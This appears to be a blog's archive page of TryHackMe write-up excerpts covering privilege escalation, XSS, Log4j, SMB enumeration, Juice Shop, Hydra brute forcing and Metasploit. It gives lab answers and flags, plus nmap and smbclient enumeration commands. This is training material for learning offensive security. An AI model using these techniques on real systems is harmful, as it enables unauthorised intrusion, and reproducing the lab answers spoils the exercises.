Used room: https://tryhackme.com/room/commonlinuxprivesc Privilege Escalation is a practice. It mainly depends upon configuration done in the system that acts as a weakness to escalate the privileges. These configurations can be of many types. For e.g.: So, today or tonight we will see various methods to do privilege escalation in Linux. Step 1: Enumerate the machineContinue reading “Common Linux Privilege Escalation”
Category Archives: THM Write Up
Net Sec Challenge
What is the highest port number being open less than 10,000? 8080 There is an open port outside the common 1000 ports; it is above 10,000. What is it? 10021 How many TCP ports are open? 6 What is the flag hidden in the HTTP server header? THM{web_server_25352} What is the flag hidden in theContinue reading “Net Sec Challenge”
Cross-site Scripting
It is an injection attack where malicious JavaScript gets injected into a web application with the intention of being executed by other users. Types of XSS Reflected XSS Stored XSS DOM based XSS Blind XSS Reflected XSS Reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without anyContinue reading “Cross-site Scripting”
Understanding Log4j
What is Log4j? Log4j is a java package mostly a part of the Apache Logging utility used to capture logs. Everything you do on the internet becomes an event that gets captured in a form of a log. Even your inputs also get captured in logs. Your application is vulnerable if it logs a user’sContinue reading “Understanding Log4j”
Tryhackme – Kenobi
Scan the machine with nmap, how many ports are open? Answer: 7 Enumerating Samba for shares nmap -p 445 –script=smb-enum-shares.nse,smb-enum-users.nse 10.10.203.136 Using the nmap command above, how many shares have been found? Answer: 3 On most distributions of Linux smbclient is already installed. Lets inspect one of the shares. smbclient //<ip>/anonymous Using your machine, connectContinue reading “Tryhackme – Kenobi”
OWASP Juice Shop
Day 1 Task – Injection Question #1: Log into the administrator account! Capture the request and change the parameters Click on send button See response in browser The token used is a jwt token which can be easily decoded from jwt.io After decoding you get the password Login with the credentials Here is your flag.Continue reading “OWASP Juice Shop”
Hydra
What is Hydra? Hydra is a brute force online password cracking program; a quick system login password ‘hacking’ tool. We can use Hydra to run through a list and ‘bruteforce’ some authentication service. Imagine trying to manually guess someones password on a particular service (SSH, Web Application Form, FTP or SNMP) – we can useContinue reading “Hydra”
Upload Vulnerabilities
Task 1 – Deploying Machine Task 4 – Overwriting Existing Files What is the name of the image file which can be overwritten? Answer – mountains.jpg Overwrite the image. What is the flag you receive? Step 1: Download a sample image Step 2: Change the name of the image Step 3: Now select the downloaded image toContinue reading “Upload Vulnerabilities”
Metasploit Framework
Metasploit, an open-source pen testing framework, is a powerful tool utilized by security engineers around the world. Maintained by Rapid 7, Metasploit is a collection of not only thoroughly tested exploits but also auxiliary and post-exploitation tools. Throughout this room, we will explore the basics of using this massive framework and a few of theContinue reading “Metasploit Framework”
Basic Pentesting
Task 1 – Web App Testing and Privilege Escalation In these set of tasks you’ll learn the following: Brute forcing Hash cracking Service enumeration Linux Enumeration The main goal here is to learn as much as possible. Find the services exposed by the machine: Use “nmap” to find out what services are running on theContinue reading “Basic Pentesting”
